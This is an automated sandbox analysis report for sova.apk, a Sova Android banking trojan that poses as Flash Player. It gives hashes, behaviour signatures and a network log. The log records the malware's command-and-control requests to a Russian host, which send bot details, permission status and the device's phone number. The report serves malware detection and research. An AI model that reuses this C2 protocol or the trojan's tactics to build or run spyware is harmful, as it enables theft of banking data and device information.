Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

6

sova.apk

android-10-x64

10

Resubmissions

24/04/2024, 11:50 UTC

240424-nzl72ahe3w 10

12/04/2024, 13:59 UTC

240412-ravpnaah86 10

28/02/2024, 13:25 UTC

240228-qnw9zacf2t 8

28/02/2024, 12:56 UTC

240228-p6fjhacb22 10

19/02/2024, 08:01 UTC

240219-jw15kaba7y 10

03/01/2024, 08:46 UTC

240103-kpajpscdcp 10

Analysis

  • max time kernel
    120s
  • max time network
    103s
  • platform
    android_x64
  • resource
    android-x64-20231215-en
  • resource tags

    androidarch:x64arch:x86image:android-x64-20231215-enlocale:en-usos:android-10-x64system
  • submitted
    19/02/2024, 08:01 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sova.apk

  • Size

    569KB

  • MD5

    01b6f0220794476fe19a54c049600ab3

  • SHA1

    eb9dfde47a393bca666e947f285f16c20baf6c32

  • SHA256

    8a6889610a18296e812fabd0a4ceb8b75caadc5cec1b39e8173c3e0093fd3a57

  • SHA512

    ac3031a6dbc5bb0d1e609979336487f14efe58f8e87480e5ef7f79c2abae56977ca444bbb5bbc7970d9c416f9c754b9fedf2bdef3b7b311c2e95e07350f9c892

  • SSDEEP

    12288:C89uYjYV1jiNQ7l5DFQo2d8GmEFDipRdWp8+iZiZ5t:9jYniCF6d8iiXg825t

Score
10/10
sovabankerinfostealerstealthtrojan

Malware Config

Signatures

  • Sova

    Android banker first seen in July 2021.

    bankertrojaninfostealersova
  • Makes use of the framework's Accessibility service 2 IoCs

    Retrieves information displayed on the phone screen using AccessibilityService.

  • Removes its main activity from the application launcher 1 IoCs
    stealthtrojan
  • Acquires the wake lock 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

Processes

  • com.adobe.flashplayer
    1⤵
    • Makes use of the framework's Accessibility service
    • Removes its main activity from the application launcher
    • Acquires the wake lock
    PID:5103

Network

  • flag-us
    DNS
    api.ipify.org
    Remote address:
    1.1.1.1:53
    Request
    api.ipify.org
    IN A
    Response
    api.ipify.org
    IN A
    104.26.12.205
    api.ipify.org
    IN A
    172.67.74.152
    api.ipify.org
    IN A
    104.26.13.205
  • flag-us
    GET
    https://api.ipify.org/
    Remote address:
    104.26.12.205:443
    Request
    GET / HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 2 Build/QSR1.210802.001)
    Host: api.ipify.org
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Date: Mon, 19 Feb 2024 08:02:24 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: keep-alive
    Vary: Origin
    CF-Cache-Status: DYNAMIC
    Server: cloudflare
    CF-RAY: 857cfcc359ef63cb-LHR
  • flag-us
    DNS
    a0545193.xsph.ru
    Remote address:
    1.1.1.1:53
    Request
    a0545193.xsph.ru
    IN A
    Response
    a0545193.xsph.ru
    IN A
    141.8.197.42
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=bots.new&botid=2fe3d982d829&botip=89.149.23.59&sdkVersion=29&deviceModel=Pixel%202&typeConnection=LTE&battery=100%25&access=koder&version=10&packet=com.breel.wallpapers18%2Ccom.ustwo.lwp%2Ccom.adobe.flashplayer%2C
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.new&botid=2fe3d982d829&botip=89.149.23.59&sdkVersion=29&deviceModel=Pixel%202&typeConnection=LTE&battery=100%25&access=koder&version=10&packet=com.breel.wallpapers18%2Ccom.ustwo.lwp%2Ccom.adobe.flashplayer%2C HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:24 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:24 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=number.update&botid=2fe3d982d829&phoneNumber=%2B15051239030
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=number.update&botid=2fe3d982d829&phoneNumber=%2B15051239030 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:24 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-us
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    142.250.200.8
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:25 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=perms&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=perms&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:25 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    142.250.200.14
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:53 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:53 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=accessibility&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=accessibility&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:02:54 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-us
    DNS
    g.tenor.com
    Remote address:
    1.1.1.1:53
    Request
    g.tenor.com
    IN A
    Response
    g.tenor.com
    IN CNAME
    tenor.googleapis.com
    tenor.googleapis.com
    IN A
    172.217.169.74
    tenor.googleapis.com
    IN A
    142.250.200.10
    tenor.googleapis.com
    IN A
    216.58.204.74
    tenor.googleapis.com
    IN A
    142.250.180.10
    tenor.googleapis.com
    IN A
    216.58.212.234
    tenor.googleapis.com
    IN A
    216.58.201.106
    tenor.googleapis.com
    IN A
    142.250.179.234
    tenor.googleapis.com
    IN A
    172.217.169.10
    tenor.googleapis.com
    IN A
    142.250.187.202
    tenor.googleapis.com
    IN A
    142.250.187.234
    tenor.googleapis.com
    IN A
    216.58.213.10
    tenor.googleapis.com
    IN A
    142.250.178.10
    tenor.googleapis.com
    IN A
    172.217.16.234
    tenor.googleapis.com
    IN A
    142.250.200.42
    tenor.googleapis.com
    IN A
    216.58.212.202
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:03:23 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:03:23 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=bots.update&botid=2fe3d982d829&param=screen&value=1 HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:03:53 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • flag-ru
    GET
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    Remote address:
    141.8.197.42:80
    Request
    GET /api?method=command.delete&id=id HTTP/1.1
    Host: a0545193.xsph.ru
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: okhttp/4.9.0
    Response
    HTTP/1.1 400 Bad Request
    Server: openresty
    Date: Mon, 19 Feb 2024 08:03:53 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
  • 104.26.12.205:443
    https://api.ipify.org/
    tls, http
    1.2kB
     6.3kB
     9
    9

    HTTP Request

    GET https://api.ipify.org/

    HTTP Response

    200
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.new&botid=2fe3d982d829&botip=89.149.23.59&sdkVersion=29&deviceModel=Pixel%202&typeConnection=LTE&battery=100%25&access=koder&version=10&packet=com.breel.wallpapers18%2Ccom.ustwo.lwp%2Ccom.adobe.flashplayer%2C
    http
    607 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.new&botid=2fe3d982d829&botip=89.149.23.59&sdkVersion=29&deviceModel=Pixel%202&typeConnection=LTE&battery=100%25&access=koder&version=10&packet=com.breel.wallpapers18%2Ccom.ustwo.lwp%2Ccom.adobe.flashplayer%2C

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    http
    445 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=number.update&botid=2fe3d982d829&phoneNumber=%2B15051239030
    http
    453 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=number.update&botid=2fe3d982d829&phoneNumber=%2B15051239030

    HTTP Response

    400
  • 142.250.200.8:443
    ssl.google-analytics.com
    tls
    1.3kB
     6.1kB
     8
    9
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    414 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=perms&value=1
    http
    444 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=perms&value=1

    HTTP Response

    400
  • 172.217.16.238:443
    tls, https
    857 B
     40 B
     1
    1
  • 142.250.200.14:443
    android.apis.google.com
    tls
    2.8kB
     7.1kB
     11
    16
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    http
    445 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    414 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=accessibility&value=1
    http
    452 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=accessibility&value=1

    HTTP Response

    400
  • 142.250.187.228:443
    tls, https
    430 B
     40 B
     2
    1
  • 142.250.187.228:443
    www.google.com
    tls
    8.5kB
     12.2kB
     26
    38
  • 172.217.169.74:443
    g.tenor.com
    tls
    1.7kB
     8.1kB
     11
    13
  • 216.58.213.14:443
    468 B
     9
  • 172.217.16.226:443
    468 B
     9
  • 216.58.201.106:443
    g.tenor.com
    468 B
     9
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    http
    445 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    414 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1
    http
    445 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=bots.update&botid=2fe3d982d829&param=screen&value=1

    HTTP Response

    400
  • 141.8.197.42:80
    http://a0545193.xsph.ru/api?method=command.delete&id=id
    http
    414 B
     571 B
     5
    5

    HTTP Request

    GET http://a0545193.xsph.ru/api?method=command.delete&id=id

    HTTP Response

    400
  • 224.0.0.251:5353
    3.3kB
     10
  • 1.1.1.1:53
    api.ipify.org
    dns
    59 B
     107 B
     1
    1

    DNS Request

    api.ipify.org

    DNS Response

    104.26.12.205
    172.67.74.152
    104.26.13.205

  • 1.1.1.1:53
    a0545193.xsph.ru
    dns
    62 B
     78 B
     1
    1

    DNS Request

    a0545193.xsph.ru

    DNS Response

    141.8.197.42

  • 1.1.1.1:53
    ssl.google-analytics.com
    dns
    70 B
     86 B
     1
    1

    DNS Request

    ssl.google-analytics.com

    DNS Response

    142.250.200.8

  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
     109 B
     1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    142.250.200.14

  • 1.1.1.1:53
    g.tenor.com
    dns
    57 B
     328 B
     1
    1

    DNS Request

    g.tenor.com

    DNS Response

    172.217.169.74
    142.250.200.10
    216.58.204.74
    142.250.180.10
    216.58.212.234
    216.58.201.106
    142.250.179.234
    172.217.169.10
    142.250.187.202
    142.250.187.234
    216.58.213.10
    142.250.178.10
    172.217.16.234
    142.250.200.42
    216.58.212.202

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.